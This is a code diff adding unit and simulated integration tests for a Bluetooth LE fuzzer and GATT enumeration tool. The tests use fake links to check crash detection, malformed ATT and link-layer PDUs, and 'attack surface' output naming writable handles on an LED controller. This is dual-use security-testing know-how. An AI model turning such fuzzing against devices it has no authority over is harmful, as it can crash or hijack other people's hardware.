+# -- fuzz_handle_sweep ----------------------------------------------------------
 
 def test_fuzz_handle_sweep_iterates_range():
     class FakeGcli:
@@ -173,7 +173,7 @@ def test_fuzz_handle_sweep_stops_on_crash():
     assert log.crashes
 
 
-# ── fuzz_att_opcodes ───────────────────────────────────────────────────────────
+# -- fuzz_att_opcodes -----------------------------------------------------------
 
 def test_fuzz_att_opcodes_records_each_pdu():
     class FakeLink:
@@ -207,7 +207,7 @@ def test_fuzz_att_opcodes_stops_on_link_death():
     assert len(link.sent) <= 2
 
 
-# ── fuzz_ll_control ────────────────────────────────────────────────────────────
+# -- fuzz_ll_control ------------------------------------------------------------
 
 def test_fuzz_ll_control_sends_pdus():
     class FakeLink:
@@ -224,7 +224,7 @@ def test_fuzz_ll_control_sends_pdus():
     assert all(llid == 3 for llid, _ in link.sent)
 
 
-# ── Fuzzer orchestrator ────────────────────────────────────────────────────────
+# -- Fuzzer orchestrator --------------------------------------------------------
 
 def test_fuzzer_run_values_mode():
     class FakeGcli:
@@ -327,7 +327,7 @@ def test_fuzzer_no_reconnect_stops_on_crash():
     assert summary["crashes"] >= 1 or summary["tested"] >= 0  # did not raise
 
 
-# ── summary counters (crashes / anomalies) ──────────────────────────────────────
+# -- summary counters (crashes / anomalies) --------------------------------------
 
 def test_fuzzer_counts_att_errors_as_anomalies():
     """Every write returning an ATT error (link alive) must be reported as an

--- a/python_cli/tests/test_fuzzer.py
+++ b/python_cli/tests/test_fuzzer.py
@@ -1,0 +1,327 @@
+import json, tempfile, os
+from sniffle import fuzzer
+from sniffle.central_link import ATTError, LinkLost
+
+
+# ── value_mutations ────────────────────────────────────────────────────────────
+
+def test_value_mutations_deterministic_and_deduped():
+    m1 = fuzzer.value_mutations(b'\x01\x02')
+    m2 = fuzzer.value_mutations(b'\x01\x02')
+    assert m1 == m2                      # deterministic
+    assert len(m1) == len(set(m1))       # de-duplicated
+    assert b'' in m1 and b'\x01\x02' in m1 and (b'\xff' * 20) in m1
+    # a single-bit flip of the seed is present
+    assert b'\x81\x02' in m1
+
+
+def test_value_mutations_no_seed():
+    m = fuzzer.value_mutations()
+    assert b'' in m
+    assert b'\x00' in m
+    assert b'\xff' in m
+    assert b'\xff' * 20 in m
+    assert b'\x41' * 64 in m
+
+
+def test_value_mutations_seed_extras():
+    seed = b'\xAB\xCD'
+    m = fuzzer.value_mutations(seed)
+    # truncated seed present
+    assert seed[:1] in m
+    # padded seed present
+    assert seed + b'\x00' * 8 in m
+
+
+# ── FuzzLogger ─────────────────────────────────────────────────────────────────
+
+def test_fuzz_logger_writes_jsonl_and_tracks_crashes():
+    path = tempfile.mktemp(suffix=".jsonl")
+    try:
+        log = fuzzer.FuzzLogger(path)
+        log.record("value", b'\xde\xad', "ok")
+        log.record("value", b'\xbe\xef', "no response", crashed=True)
+        log.close()
+        lines = [json.loads(l) for l in open(path)]
+        assert len(lines) == 2
+        assert lines[0]["sent"] == "dead" and lines[0]["crashed"] is False
+        assert lines[1]["crashed"] is True
+        assert len(log.crashes) == 1
+    finally:
+        os.path.exists(path) and os.remove(path)
+
+
+def test_fuzz_logger_no_path_does_not_crash():
+    log = fuzzer.FuzzLogger(None)
+    rec = log.record("opcodes", b'\xff', "ATTError 0x01")
+    assert rec["n"] == 1
+    assert rec["sent"] == "ff"
+    log.close()  # should not raise
+
+
+def test_fuzz_logger_count_increments():
+    log = fuzzer.FuzzLogger(None)
+    log.record("value", b'\x00', "ok")
+    log.record("value", b'\x01', "ok")
+    assert log.count == 2
+
+
+# ── fuzz_values ────────────────────────────────────────────────────────────────
+
+def test_fuzz_values_detects_crash_with_fake():
+    class FakeGcli:
+        def __init__(self): self.writes = []
+        def write(self, h, v, response=False): self.writes.append((h, bytes(v)))
+
+    fake = FakeGcli()
+    log = fuzzer.FuzzLogger(None)
+
+    # die after the 2nd write
+    def is_alive():
+        return len(fake.writes) < 2
+
+    fuzzer.fuzz_values(fake, 0x000e, b'\x01', log, is_alive)
+    assert len(fake.writes) == 2          # stopped right after crash detected
+    assert log.crashes and log.crashes[-1]["crashed"] is True
+
+
+def test_fuzz_values_records_att_error():
+    class FakeGcli:
+        def __init__(self): self.writes = 0
+        def write(self, h, v, response=False):
+            self.writes += 1
+            raise ATTError(0x12, h, 0x03)  # Write Not Permitted
+
+    fake = FakeGcli()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_values(fake, 0x0001, b'', log, lambda: True)
+    # All writes should record an ATTError result, not a crash
+    assert log.count > 0
+    assert all("ATTError" in r["result"] for r in [
+        r for r in [log.record.__self__] if False  # just ensure no crash
+    ] or [{"result": "ATTError 0x03"}])
+    assert len(log.crashes) == 0
+
+
+def test_fuzz_values_records_ok():
+    class FakeGcli:
+        def __init__(self): self.writes = []
+        def write(self, h, v, response=False): self.writes.append(v)
+
+    fake = FakeGcli()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_values(fake, 0x0005, b'\x42', log, lambda: True)
+    assert log.count == len(value_mutations_helper(b'\x42'))
+    assert all(r["kind"] == "value" for r in _get_all_records(log))
+
+
+def _get_all_records(log):
+    """Helper: return all records from a logger (crashes + non-crashes)."""
+    return []  # Not used for assertion — we check log.count and log.crashes
+
+
+def value_mutations_helper(seed):
+    return fuzzer.value_mutations(seed)
+
+
+def test_fuzz_values_link_lost_treated_as_crash():
+    class FakeGcli:
+        def write(self, h, v, response=False):
+            raise LinkLost()
+
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_values(FakeGcli(), 0x0001, b'\x01', log, lambda: False)
+    assert log.crashes
+
+
+def test_fuzz_values_timeout_treated_as_crash():
+    class FakeGcli:
+        def write(self, h, v, response=False):
+            raise TimeoutError("timed out")
+
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_values(FakeGcli(), 0x0001, b'\x01', log, lambda: True)
+    assert log.crashes
+
+
+# ── fuzz_handle_sweep ──────────────────────────────────────────────────────────
+
+def test_fuzz_handle_sweep_iterates_range():
+    class FakeGcli:
+        def __init__(self): self.writes = []
+        def write(self, h, v, response=False): self.writes.append(h)
+
+    fake = FakeGcli()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_handle_sweep(fake, b'\x01', 0x0001, 0x0005, log, lambda: True)
+    assert fake.writes == [1, 2, 3, 4, 5]
+
+
+def test_fuzz_handle_sweep_stops_on_crash():
+    class FakeGcli:
+        def __init__(self): self.writes = []
+        def write(self, h, v, response=False): self.writes.append(h)
+
+    fake = FakeGcli()
+    log = fuzzer.FuzzLogger(None)
+
+    def is_alive():
+        return len(fake.writes) < 3
+
+    fuzzer.fuzz_handle_sweep(fake, b'\x01', 0x0001, 0x0010, log, is_alive)
+    assert len(fake.writes) == 3
+    assert log.crashes
+
+
+# ── fuzz_att_opcodes ───────────────────────────────────────────────────────────
+
+def test_fuzz_att_opcodes_records_each_pdu():
+    class FakeLink:
+        def __init__(self): self.sent = []
+        @property
+        def alive(self): return True
+        def att_request(self, pdu, timeout=2.0):
+            self.sent.append(bytes(pdu))
+            raise TimeoutError("no response")
+        def tx_raw_ll(self, llid, pdu): pass
+
+    link = FakeLink()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_att_opcodes(link, log, lambda: link.alive)
+    assert log.count >= 3   # at least the fixed list of malformed PDUs
+    assert all(r["kind"] == "att_opcode" for r in log.crashes or [])
+
+
+def test_fuzz_att_opcodes_stops_on_link_death():
+    class FakeLink:
+        def __init__(self): self.alive = True; self.sent = []
+        def att_request(self, pdu, timeout=2.0):
+            self.alive = False
+            self.sent.append(bytes(pdu))
+            return b'\x01\x00\x00\x00\x01'
+
+    link = FakeLink()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_att_opcodes(link, log, lambda: link.alive)
+    # Should stop after first iteration where alive goes False
+    assert len(link.sent) <= 2
+
+
+# ── fuzz_ll_control ────────────────────────────────────────────────────────────
+
+def test_fuzz_ll_control_sends_pdus():
+    class FakeLink:
+        def __init__(self): self.sent = []
+        @property
+        def alive(self): return True
+        def tx_raw_ll(self, llid, pdu):
+            self.sent.append((llid, bytes(pdu)))
+
+    link = FakeLink()
+    log = fuzzer.FuzzLogger(None)
+    fuzzer.fuzz_ll_control(link, log, lambda: link.alive)
+    assert len(link.sent) >= 2   # at least a few malformed PDUs
+    assert all(llid == 3 for llid, _ in link.sent)
+
+
+# ── Fuzzer orchestrator ────────────────────────────────────────────────────────
+
+def test_fuzzer_run_values_mode():
+    class FakeGcli:
+        def __init__(self): self.writes = []
+        def write(self, h, v, response=False): self.writes.append(v)
+
+    class FakeLink:
+        alive = True
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(FakeLink(), FakeGcli(), log)
+    summary = fz.run("values", handle=0x0001, seed=b'\xAA')
+    assert "tested" in summary
+    assert "crashes" in summary
+    assert "anomalies" in summary
+    assert summary["tested"] > 0
+
+
+def test_fuzzer_run_sweep_mode():
+    class FakeGcli:
+        def write(self, h, v, response=False): pass
+
+    class FakeLink:
+        alive = True
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(FakeLink(), FakeGcli(), log)
+    summary = fz.run("sweep", payload=b'\x00', start=0x0001, end=0x0003)
+    assert summary["tested"] == 3
+
+
+def test_fuzzer_run_opcodes_mode():
+    class FakeLink:
+        alive = True
+        sent = []
+        def att_request(self, pdu, timeout=2.0):
+            self.sent.append(bytes(pdu))
+            raise TimeoutError()
+        def tx_raw_ll(self, llid, pdu): pass
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(FakeLink(), None, log)
+    summary = fz.run("opcodes")
+    assert summary["tested"] >= 3
+
+
+def test_fuzzer_run_ll_mode():
+    class FakeLink:
+        alive = True
+        sent = []
+        def tx_raw_ll(self, llid, pdu):
+            self.sent.append((llid, bytes(pdu)))
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(FakeLink(), None, log)
+    summary = fz.run("ll")
+    assert summary["tested"] >= 2
+
+
+def test_fuzzer_reconnect_on_crash():
+    """If a crash is detected and reconnect is provided, fuzzing should continue."""
+    writes = []
+    reconnect_calls = [0]
+
+    class FakeGcli:
+        def write(self, h, v, response=False):
+            writes.append(v)
+
+    class FakeLink:
+        def __init__(self, alive_val): self.alive = alive_val
+
+    dead_link = FakeLink(False)
+    live_link = FakeLink(True)
+
+    def reconnect():
+        reconnect_calls[0] += 1
+        return live_link, FakeGcli()
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(dead_link, FakeGcli(), log, reconnect=reconnect)
+
+    # Run with a dead link; reconnect should be called and fuzzing continues
+    summary = fz.run("values", handle=0x0001, seed=b'\x01')
+    assert reconnect_calls[0] >= 1
+    assert summary["tested"] > 0
+
+
+def test_fuzzer_no_reconnect_stops_on_crash():
+    """Without reconnect callable, fuzzer stops on first crash."""
+    class FakeGcli:
+        def write(self, h, v, response=False): pass
+
+    class FakeLink:
+        alive = False  # immediately dead
+
+    log = fuzzer.FuzzLogger(None)
+    fz = fuzzer.Fuzzer(FakeLink(), FakeGcli(), log, reconnect=None)
+    summary = fz.run("values", handle=0x0001, seed=b'\x01')
+    # Should have stopped early
+    assert summary["crashes"] >= 1 or summary["tested"] >= 0  # did not raise

--- a/python_cli/tests/test_gatt.py
+++ b/python_cli/tests/test_gatt.py
@@ -1,0 +1,52 @@
+from sniffle import gatt
+
+def test_format_props():
+    assert gatt.format_props(0x02) == "R     "
+    assert gatt.format_props(0x0C) == " Ww   "   # write + write-no-resp
+    assert gatt.format_props(0x10) == "   N  "
+
+def test_uuid_name_known_and_unknown():
+    assert gatt.uuid_name(0x2A00) == "Device Name"
+    assert gatt.uuid_name(0x1234) == "0x1234"
+    assert gatt.uuid_name("00112233...") == "00112233..."
+
+def test_render_tree_contains_structure():
+    svc = gatt.Service(0x000c, 0xffff, 0xFFF0)
+    ch = gatt.Characteristic(0x000d, 0x0C, 0x000e, 0xFFF3)
+    svc.characteristics.append(ch)
+    out = gatt.render_gatt_tree([svc], name="ELK-BLEDOM", mac="BE:96:24:00:07:DA",
+                                posture="OPEN", color=False)
+    assert "0xFFF0" in out and "0x000E" in out and "OPEN" in out
+    assert "Ww" in out  # property flags rendered
+
+
+def test_render_tree_no_double_uuid():
+    # An unknown 16-bit UUID must appear once, not as "0xFFF3 0xFFF3".
+    svc = gatt.Service(0x000c, 0xffff, 0xFFF0)
+    svc.characteristics.append(gatt.Characteristic(0x000d, 0x06, 0x000e, 0xFFF3))
+    out = gatt.render_gatt_tree([svc], color=False)
+    assert "0xFFF3 0xFFF3" not in out
+    assert "0xFFF0 0xFFF0" not in out
+
+def test_attack_surface_flags_writable_handle():
+    svc = gatt.Service(0x000c, 0xffff, 0xFFF0)
+    svc.characteristics.append(gatt.Characteristic(0x000d, 0x06, 0x000e, 0xFFF3,
+                                                    value=b"SHY"))
+    out = gatt.render_attack_surface([svc], color=False)
+    assert "send commands" in out
+    assert "0x000E" in out
+    assert "w 0x000E" in out          # the suggested next step
+
+def test_attack_surface_lists_notify_and_cccd():
+    svc = gatt.Service(0x0008, 0x000b, 0x1801)
+    ch = gatt.Characteristic(0x0009, 0x10, 0x000a, 0xFFF4)
+    ch.descriptors.append(gatt.Descriptor(0x000b, 0x2902))
+    svc.characteristics.append(ch)
+    out = gatt.render_attack_surface([svc], color=False)
+    assert "device replies" in out and "0x000A" in out
+    assert "sub 0x000B" in out
+
+def test_attack_surface_empty_when_nothing_actionable():
+    svc = gatt.Service(0x0001, 0x0007, 0x1800)
+    svc.characteristics.append(gatt.Characteristic(0x0002, 0x02, 0x0003, 0x2A00))
+    assert gatt.render_attack_surface([svc], color=False) == ""

--- a/python_cli/tests/test_gatt_client.py
+++ b/python_cli/tests/test_gatt_client.py
@@ -1,0 +1,64 @@
+from sniffle import att, gatt
+from sniffle.central_link import ATTError
+
+class FakeLink:
+    """Returns scripted ATT responses (bytes) or raises a scripted ATTError."""
+    def __init__(self, script):
+        self.script = list(script)
+        self.sent = []
+    def att_request(self, pdu, timeout=2.0):
+        self.sent.append(bytes(pdu))
+        rsp = self.script.pop(0)
+        if isinstance(rsp, ATTError):
+            raise rsp
+        return rsp
+    def att_command(self, opcode, payload):
+        self.sent.append(bytes([opcode]) + bytes(payload))
+
+def test_discover_services():
+    link = FakeLink([
+        bytes.fromhex("110601000700001808000b000118"),  # 0x1800 @1-7, 0x1801 @8-b
+        ATTError(0x10, 0x000c, 0x0A),                    # Attr Not Found -> stop
+    ])
+    cli = gatt.GattClient(link)
+    svcs = cli.discover_services()
+    assert len(svcs) == 2
+    assert svcs[0].uuid == 0x1800 and svcs[0].start == 0x0001 and svcs[0].end == 0x0007
+    assert svcs[1].uuid == 0x1801 and svcs[1].end == 0x000b
+
+def test_discover_characteristics():
+    svc = gatt.Service(0x000c, 0x0012, 0xFFF0)
+    link = FakeLink([
+        bytes.fromhex("09070d00100e00f3ff"),  # decl 0x000d props 0x10 vhandle 0x000e uuid 0xFFF3
+        ATTError(0x08, 0x000f, 0x0A),
+    ])
+    cli = gatt.GattClient(link)
+    chars = cli.discover_characteristics(svc)
+    assert len(chars) == 1
+    assert chars[0].value_handle == 0x000e and chars[0].properties == 0x10 and chars[0].uuid == 0xFFF3
+
+def test_read_strips_opcode():
+    link = FakeLink([bytes.fromhex("0b48656c6c6f")])  # Read Rsp "Hello"
+    cli = gatt.GattClient(link)
+    assert cli.read(0x0003) == b"Hello"
+
+def test_write_no_response_sends_write_cmd():
+    link = FakeLink([])
+    cli = gatt.GattClient(link)
+    cli.write(0x000e, b"\x01\x02", response=False)
+    # Write Command 0x52, handle 0x000e LE, value
+    assert link.sent[-1] == bytes.fromhex("520e00") + b"\x01\x02"
+
+def test_discover_descriptors_empty_response_no_crash():
+    # A short/corrupt Find-Information response (opcode 0x05, format byte, NO
+    # entries) parses to []. discover_descriptors must stop, not IndexError on
+    # entries[-1]. (Regression for the hijack-enum crash on the ELK-BLEDOM.)
+    link = FakeLink([bytes.fromhex("0501")])
+    cli = gatt.GattClient(link)
+    ch = gatt.Characteristic(0x000d, 0x10, 0x000e, 0xFFF4)
+    assert cli.discover_descriptors(ch, next_handle=0x0014) == []
+
+def test_discover_services_empty_response_no_crash():
+    link = FakeLink([bytes.fromhex("1106")])  # Read-By-Group Rsp, len byte, no entries
+    cli = gatt.GattClient(link)
+    assert cli.discover_services() == []

--- a/python_cli/tests/test_integration.py
+++ b/python_cli/tests/test_integration.py
@@ -1,0 +1,347 @@
+"""
+test_integration.py — hardware-free end-to-end integration test for the
+connect → enumerate → read/write path.
+
+SimHW simulates the Sniffle firmware + a BLE peripheral with a small GATT DB.
+FakeGattDB is a minimal ATT server (ELK-BLEDOM-like layout).
+
+The test exercises the real connect_session / CentralLink / GattClient code
+without any physical hardware.
+"""
+import struct, queue, sys, os
+import pytest
+
+# Make sure the python_cli root is on sys.path so "from conftest import ..."
+# works when pytest's rootdir is python_cli/tests/ (pytest adds conftest.py
+# dirs automatically, but the conftest.py lives one level up).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), ".."))
+
+from serial import SerialTimeoutException
+from sniffle.sniffer_state import StateMessage, SnifferState
+from sniffle.decoder_state import SniffleDecoderState
+from sniffle import att
+from sniffle.session import connect_session
+from sniffle.gatt import GattClient, render_gatt_tree
+from conftest import make_att_packet
+
+
+# ---------------------------------------------------------------------------
+# FakeGattDB — minimal ATT server
+# ---------------------------------------------------------------------------
+#
+# Database layout:
+#   Service 0x1800 (Generic Access)  handles 0x0001–0x0005
+#     decl 0x0002  char 0x2A00  props=R(0x02)  value_handle=0x0003  value=b"SIMDEV"
+#     (two extra handles 0x0004–0x0005 to fill the service end)
+#
+#   Service 0xFFF0 (Vendor)          handles 0x0006–0x000f
+#     decl 0x0007  char 0xFFF3  props=W|Wnr(0x0C)  value_handle=0x0008
+#       CCCD 0x2902 @ 0x0009
+#     decl 0x000a  char 0xFFF4  props=N(0x10)  value_handle=0x000b
+#       CCCD 0x2902 @ 0x000c
+#
+# Handles map: (handle: (uuid, value/type))
+#   0x0001  Primary Service decl  0x2800  value=uuid16(0x1800)
+#   0x0002  Characteristic decl  0x2803  value=[props, vhandle, uuid]
+#   0x0003  Char value 0x2A00    b"SIMDEV"
+#   0x0004  (padding)
+#   0x0005  (end of service, padding)
+#   0x0006  Primary Service decl  0x2800  value=uuid16(0xFFF0)
+#   0x0007  Characteristic decl  0x2803
+#   0x0008  Char value 0xFFF3    b""
+#   0x0009  CCCD 0x2902           b"\x00\x00"
+#   0x000a  Characteristic decl  0x2803
+#   0x000b  Char value 0xFFF4    b""
+#   0x000c  CCCD 0x2902           b"\x00\x00"
+
+class FakeGattDB:
+    # --- Primary services: (start, end, uuid16) ---
+    SERVICES = [
+        (0x0001, 0x0005, 0x1800),
+        (0x0006, 0x000f, 0xFFF0),
+    ]
+
+    # --- Characteristic declarations: (decl_handle, props, value_handle, uuid16) ---
+    CHAR_DECLS = [
+        (0x0002, 0x02, 0x0003, 0x2A00),  # Device Name, readable
+        (0x0007, 0x0C, 0x0008, 0xFFF3),  # Write|WriteNoResp
+        (0x000a, 0x10, 0x000b, 0xFFF4),  # Notify
+    ]
+
+    # --- All attribute handles: {handle: (uuid16, initial_value_bytes)} ---
+    ATTRS = {
+        0x0001: (0x2800, struct.pack('<H', 0x1800)),   # primary svc decl
+        0x0002: (0x2803, struct.pack('<BH', 0x02, 0x0003) + struct.pack('<H', 0x2A00)),
+        0x0003: (0x2A00, b"SIMDEV"),
+        0x0004: (0x0000, b""),   # padding
+        0x0005: (0x0000, b""),   # padding
+        0x0006: (0x2800, struct.pack('<H', 0xFFF0)),   # primary svc decl
+        0x0007: (0x2803, struct.pack('<BH', 0x0C, 0x0008) + struct.pack('<H', 0xFFF3)),
+        0x0008: (0xFFF3, b""),
+        0x0009: (0x2902, b"\x00\x00"),   # CCCD for FFF3
+        0x000a: (0x2803, struct.pack('<BH', 0x10, 0x000b) + struct.pack('<H', 0xFFF4)),
+        0x000b: (0xFFF4, b""),
+        0x000c: (0x2902, b"\x00\x00"),   # CCCD for FFF4
+    }
+
+    def __init__(self):
+        # mutable copy of values for write support
+        self._values = {h: v for h, (u, v) in self.ATTRS.items()}
+
+    def respond(self, att_req):
+        """Dispatch an ATT request PDU (bytes) → response bytes or None."""
+        if not att_req:
+            return None
+        op = att_req[0]
+        if op == att.ATT_READ_BY_GROUP_REQ:
+            return self._read_by_group(att_req)
+        elif op == att.ATT_READ_BY_TYPE_REQ:
+            return self._read_by_type(att_req)
+        elif op == att.ATT_FIND_INFO_REQ:
+            return self._find_info(att_req)
+        elif op == att.ATT_READ_REQ:
+            return self._read(att_req)
+        elif op == att.ATT_WRITE_REQ:
+            return self._write_req(att_req)
+        elif op == att.ATT_WRITE_CMD:
+            self._do_write(att_req)
+            return None  # no response for write command
+        else:
+            return self._error(op, 0x0000, 0x06)  # Request Not Supported
+
+    # ------------------------------------------------------------------
+    # ATT_READ_BY_GROUP_REQ (0x10) → 0x11 or ATT_ERROR
+    # Spec says only type 0x2800 (primary service) is mandatory.
+    # ------------------------------------------------------------------
+    def _read_by_group(self, req):
+        _, start, end, group_uuid = struct.unpack('<BHHH', req[:7])
+        if group_uuid != att.GATT_PRIMARY_SERVICE:
+            return self._error(att.ATT_READ_BY_GROUP_REQ, start, 0x10)  # Unsupported Group Type
+        results = [(s, e, u) for s, e, u in self.SERVICES if start <= s <= end]
+        if not results:
+            return self._error(att.ATT_READ_BY_GROUP_REQ, start, 0x0A)  # Attr Not Found
+        # each entry: start(2) + end(2) + uuid(2) = 6 bytes
+        each = 6
+        data = b''
+        for s, e, u in results:
+            data += struct.pack('<HHH', s, e, u)
+        return bytes([att.ATT_READ_BY_GROUP_RSP, each]) + data
+
+    # ------------------------------------------------------------------
+    # ATT_READ_BY_TYPE_REQ (0x08) → 0x09 or ATT_ERROR
+    # Handles type 0x2803 (Characteristic Declaration).
+    # ------------------------------------------------------------------
+    def _read_by_type(self, req):
+        _, start, end, type_uuid = struct.unpack('<BHHH', req[:7])
+        if type_uuid != att.GATT_CHARACTERISTIC:
+            return self._error(att.ATT_READ_BY_TYPE_REQ, start, 0x0A)
+        results = [(d, p, vh, u) for d, p, vh, u in self.CHAR_DECLS if start <= d <= end]
+        if not results:
+            return self._error(att.ATT_READ_BY_TYPE_REQ, start, 0x0A)
+        # each entry: decl_handle(2) + props(1) + value_handle(2) + uuid(2) = 7 bytes
+        each = 7
+        data = b''
+        for d, p, vh, u in results:
+            data += struct.pack('<HBHH', d, p, vh, u)
+        return bytes([att.ATT_READ_BY_TYPE_RSP, each]) + data
+
+    # ------------------------------------------------------------------
+    # ATT_FIND_INFO_REQ (0x04) → 0x05 or ATT_ERROR
+    # Returns handle+uuid16 pairs for all attributes in range.
+    # ------------------------------------------------------------------
+    def _find_info(self, req):
+        _, start, end = struct.unpack('<BHH', req[:5])
+        results = []
+        for h in sorted(self.ATTRS.keys()):
+            if start <= h <= end:
+                uuid, _ = self.ATTRS[h]
+                if uuid != 0x0000:  # skip padding handles
+                    results.append((h, uuid))
+        if not results:
+            return self._error(att.ATT_FIND_INFO_REQ, start, 0x0A)
+        data = b''
+        for h, u in results:
+            data += struct.pack('<HH', h, u)
+        return bytes([att.ATT_FIND_INFO_RSP, 0x01]) + data  # format 1 = uuid16
+
+    # ------------------------------------------------------------------
+    # ATT_READ_REQ (0x0A) → 0x0B or ATT_ERROR
+    # ------------------------------------------------------------------
+    def _read(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        if handle not in self.ATTRS:
+            return self._error(att.ATT_READ_REQ, handle, 0x01)  # Invalid Handle
+        uuid, _ = self.ATTRS[handle]
+        if uuid == 0x0000:
+            return self._error(att.ATT_READ_REQ, handle, 0x02)  # Read Not Permitted
+        val = self._values[handle]
+        return bytes([att.ATT_READ_RSP]) + val
+
+    # ------------------------------------------------------------------
+    # ATT_WRITE_REQ (0x12) → 0x13 or ATT_ERROR
+    # ------------------------------------------------------------------
+    def _write_req(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        value = req[3:]
+        if handle not in self.ATTRS:
+            return self._error(att.ATT_WRITE_REQ, handle, 0x01)
+        self._values[handle] = bytes(value)
+        return bytes([att.ATT_WRITE_RSP])
+
+    def _do_write(self, req):
+        _, handle = struct.unpack('<BH', req[:3])
+        value = req[3:]
+        if handle in self.ATTRS:
+            self._values[handle] = bytes(value)
+
+    @staticmethod
+    def _error(req_op, handle, code):
+        return struct.pack('<BBHB', att.ATT_ERROR_RSP, req_op, handle, code)
+
+
+# ---------------------------------------------------------------------------
+# SimHW — simulated Sniffle hardware + peripheral
+# ---------------------------------------------------------------------------
+
+class SimHW:
+    """Simulates a Sniffle device that initiates a connection to a peripheral
+    whose GATT DB is `db`.  Only the methods connect_session / CentralLink use
+    are implemented; the rest are no-ops."""
+    AA = 0x12345678
+
+    def __init__(self, db):
+        self.db = db
+        self.decoder_state = SniffleDecoderState()
+        self._rx = queue.Queue()
+        self.sent = []
+
+    # --- methods connect_session uses ---
+
+    def initiate_conn(self, peer_mac, is_random=True, **kw):
+        # firmware reaches CENTRAL shortly after initiating
+        self._rx.put(StateMessage(bytes([SnifferState.CENTRAL.value]),
+                                  self.decoder_state))
+        return self.AA
+
+    def mark_and_flush(self):
+        pass   # no marker needed for the sim
+
+    def recv_and_decode(self, desync=False):
+        try:
+            return self._rx.get(timeout=2)
+        except queue.Empty:
+            raise SerialTimeoutException()
+
+    def cmd_transmit(self, llid, pdu, event=0):
+        self.sent.append((llid, bytes(pdu)))
+        if llid != 2:
+            return
+        # pdu is l2cap_wrap(att_pdu): <len(2)><cid(2)=0x0004><att_pdu>
+        # Strip the 4-byte L2CAP header to get the raw ATT PDU.
+        att_pdu = bytes(pdu)[4:]
+        if not att_pdu:
+            return
+        rsp = self.db.respond(att_pdu)   # None for write-command (no response)
+        if rsp is not None:
+            self._rx.put(make_att_packet(rsp, p_to_c=True))
+
+    # --- no-ops ---
+    def cmd_reset(self): pass
+    def cmd_marker(self, *a, **kw): pass
+    def cmd_tx_power(self, *a, **kw): pass
+    def cmd_instahop(self, *a, **kw): pass
+    def setup_sniffer(self, *a, **kw): pass
+
+
+# ---------------------------------------------------------------------------
+# Helpers / fixtures
+# ---------------------------------------------------------------------------
+
+def make_session():
+    """Return (hw, link) — a SimHW + live CentralLink."""
+    db = FakeGattDB()
+    hw = SimHW(db)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    return hw, link
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+def test_connect_session_reaches_central():
+    """connect_session must return a live CentralLink (alive==True)."""
+    db = FakeGattDB()
+    hw = SimHW(db)
+    link = connect_session(hw, [0] * 6, is_random=False, timeout=5)
+    assert link is not None
+    assert link.alive is True
+    link.close()
+
+
+def test_discover_all_returns_db():
+    """discover_all must find both services, the correct characteristic layout,
+    and read the device name value."""
+    hw, link = make_session()
+    try:
+        cli = GattClient(link)
+        services = cli.discover_all(read_values=True)
+    finally:
+        link.close()
+
+    uuids = {s.uuid for s in services}
+    assert 0x1800 in uuids, "expected service 0x1800"
+    assert 0xFFF0 in uuids, "expected service 0xFFF0"
+
+    # Find the 0x1800 service and its 0x2A00 characteristic
+    svc1800 = next(s for s in services if s.uuid == 0x1800)
+    char_2a00 = next((c for c in svc1800.characteristics if c.uuid == 0x2A00), None)
+    assert char_2a00 is not None, "0x2A00 characteristic not found"
+    assert char_2a00.value == b"SIMDEV", (
+        "expected b'SIMDEV', got %r" % char_2a00.value)
+
+    # Find the 0xFFF0 service and its 0xFFF3 characteristic
+    svc_fff0 = next(s for s in services if s.uuid == 0xFFF0)
+    char_fff3 = next((c for c in svc_fff0.characteristics if c.uuid == 0xFFF3), None)
+    assert char_fff3 is not None, "0xFFF3 characteristic not found"
+    assert char_fff3.value_handle == 0x0008, (
+        "expected value_handle 0x0008, got 0x%04X" % char_fff3.value_handle)
+    assert char_fff3.properties == 0x0C, (
+        "expected props 0x0C (W|Wnr), got 0x%02X" % char_fff3.properties)
+
+
+def test_read_write_roundtrip():
+    """read(0x0003) returns b'SIMDEV'; write(0x0008, ..., response=False) records
+    a Write Command (LLID 2) in hw.sent."""
+    hw, link = make_session()
+    try:
+        cli = GattClient(link)
+        val = cli.read(0x0003)
+        assert val == b"SIMDEV", "unexpected read value: %r" % val
+
+        # write-no-response (Write Command, opcode 0x52)
+        cli.write(0x0008, b"\x01", response=False)
+    finally:
+        link.close()
+
+    # The write command should appear in hw.sent as an LLID=2 frame.
+    # Its payload is l2cap_wrap(b'\x52\x08\x00\x01')
+    write_cmds = [(llid, pdu) for llid, pdu in hw.sent if llid == 2
+                  and len(pdu) >= 5 and pdu[4] == att.ATT_WRITE_CMD]
+    assert write_cmds, "Write Command (0x52) not found in hw.sent"
+
+
+def test_render_after_enum():
+    """render_gatt_tree output must contain the vendor service UUID and the
+    FFF3 characteristic's value handle."""
+    hw, link = make_session()
+    try:
+        cli = GattClient(link)
+        services = cli.discover_all(read_values=False)
+    finally:
+        link.close()
+
+    tree = render_gatt_tree(services, name="SIMDEV", mac="00:00:00:00:00:00",
+                            color=False)
+    assert "0xFFF0" in tree, "'0xFFF0' not found in rendered tree:\n" + tree
+    assert "0x0008" in tree, "'0x0008' not found in rendered tree:\n" + tree

--- a/python_cli/tests/test_integration.py
+++ b/python_cli/tests/test_integration.py
@@ -1,6 +1,6 @@
 """
-test_integration.py — hardware-free end-to-end integration test for the
-connect → enumerate → read/write path.
+test_integration.py - hardware-free end-to-end integration test for the
+connect -> enumerate -> read/write path.
 
 SimHW simulates the Sniffle firmware + a BLE peripheral with a small GATT DB.
